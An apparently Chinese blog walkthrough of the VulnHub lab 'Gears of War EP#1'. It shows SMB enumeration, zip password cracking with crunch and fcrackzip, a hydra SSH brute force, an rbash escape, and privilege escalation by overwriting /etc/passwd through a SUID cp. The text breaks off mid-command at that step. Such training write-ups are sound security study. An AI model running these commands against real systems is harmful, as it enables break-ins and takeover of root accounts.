目录

  • 介绍
  • 信息收集
    • 主机发现
    • 主机信息探测
    • 访问网站
  • 测试 samba 安全
    • smbmap 访问默认共享
    • enum4linux 获取系统用户
    • smbclient获取文件
    • 查看文件
  • SSH爆破
  • 登录SSH
    • 绕过rbash
    • 提权
    • 查看flag
  • 参考

介绍

系列:Gears of War(此系列仅此一台)
发布日期: 2019年10月17日
难度: 初级
Flag : 不详
学习:SMB攻击
靶机地址:https://www.vulnhub.com/entry/gears-of-war-ep1,382/
涉及到的相关工具,参见之前的文章:HACKNOS: OS-BYTESEC

信息收集

主机发现

netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。

主机信息探测

信息探测:nmap -A -p- 192.168.124.10,开放了22、80、139、445端口,445的信息过多,靶机的重点是在445上。

访问网站

会注意到网站上面有一个按钮,点击之后依然是一个静态页面,没啥玩的。

测试 samba 安全

smbmap 访问默认共享

smbmap -H 192.168.124.10,发现LOCUS_LAN$有读取权限

递归读取LOCUS_LAN$文件夹:smbmap -H 192.168.124.10 -R LOCUS_LAN$

enum4linux 获取系统用户

使用命令:enum4linux 192.168.124.10 -R | grep Local
枚举出三个用户:marcus、root、nobody

smbclient获取文件

使用空密码连接靶机的共享文件夹,使用get命令下载文件

查看文件

压缩包需要密码才能打开,txt给了一些提示,猜测是@%%,的某一种排列组合才能打开数据包

  1. 生成字典:crunch 4 4 -t @%%, > list.txt
  2. 爆破压缩包
    1. 安装工具:sudo apt-get install fcrackzip
    2. 爆破:fcrackzip -D -u -p list.txt msg_horda.zip

翻译一下,给了我们一些字符:3_d4y。大概率就是这个靶机上的某用户的名字或者密码,由于压缩包解压之后得到的是key.txt,猜测这个应该是密码。

SSH爆破

hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.124.10

登录SSH

使用命令:ssh marcus@192.168.124.10
发现自己的家目录里面有个文件夹,但是访问它的时候被拒了,提示rbash是受限制的。

绕过rbash

指定终端:ssh marcus@192.168.124.10 -t "bash -noprofile"
进来之后,发现啥也没有

提权

家目录下没啥文件,直接提权吧。

  1. 查找SUID文件:find / -type f -perm -u=s 2>/dev/null

发现了cp,剩下的简单了,替换passwd文件实现提权即可

  1. 提取出靶机的passwd文件:cat /etc/passwd > passwd
  2. kali通过OpenSSL passwd生成一个新的用户hacker,密码为hack123:
┌──(root												

Vulnhub靶机:GEARS OF WAR_ EP#1相关推荐

  1. Vulnhub靶机:HACKER KID_ 1.0.1

    目录 介绍 信息收集 主机发现 主机信息探测 53 端口 网站探测 页面源代码 DIG信息收集 经典XXE漏洞 探测9999端口 SSTI模板注入 Capabilities 提权 发现具有Capabi ...

  2. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  3. Vulnhub靶机系列:SecTalks: BNE0x03 - Simple

    这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...

  4. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  5. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  6. Vulnhub靶机DC系列-DC-8

    Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...

  7. Vulnhub靶机:EVILBOX_ ONE(很详细)

    目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 目录扫描字典 爆破页面参数 Burpsuite爆破参数 ffuf 补充:区分文件包含与文件读取 文件包含漏洞 文件包含.任意文件读取的 ...

  8. Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...

  9. Vulnhub靶机Wakanda渗透测试攻略

    前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...

最新文章

  1. PC和手机怎么实现绝对居中?
  2. Mock session,cookie,querystring in ASB.NET MVC
  3. 苹果Mac操作系统下怎么显示隐藏文件
  4. c语言 static 关键字的作用
  5. 一键拼出你的微信好友图片墙!
  6. python比较列表所有项是否有相同的部分_检查列表中的所有元素是否相同
  7. 马云语录,非常值得一看(转)
  8. 1031. 查验身份证(15)
  9. oracle之数据处理之视图
  10. rman 脚本备份全过程
  11. 决策树(十)--GBDT及OpenCV源码分析
  12. 基于深度学习的问答系统论文
  13. Java面试题!mysql安装教程图解
  14. Vulnhub靶场之symfonos:1
  15. matlab 元胞自动机
  16. Echarts通用饼图、柱状图、折线图封装
  17. 机器视觉 零基础Python+OpenCV+MediaPipe手势识别教程(一)手势识别基础入门
  18. 北京博奥智源,浅谈术语管理服务器软件开发所需功能设计
  19. 微信公众号 服务器自动回复,微信订阅后台自动回复功能的实现
  20. iOS开发,导入c文件引发的 Unknown type name 'NSString' 问题

热门文章

  1. [基础数论]CRT中国剩余定理(模数互质与不互质)
  2. Android: Camera2相机开发 知识储备
  3. 修改video标签默认样式问题video播放器样式优化;video播放器默认显示图片
  4. 学生如何掌握学习诀窍?这招很实用
  5. Flask实战!从后台管理到人脸识别,六款优质Flask开源项目介绍
  6. 实验室信息管理系统源码,LIS系统源码
  7. 计算机网络局域网之以太网交换机
  8. numpy 中 sign 函数的用法
  9. FuzzyDID:模糊倍分法
  10. 怎么就能打开微信服务器恢复朋友圈信息,今天才知道,原来微信打开这个功能,就能删除几年前的朋友圈内容...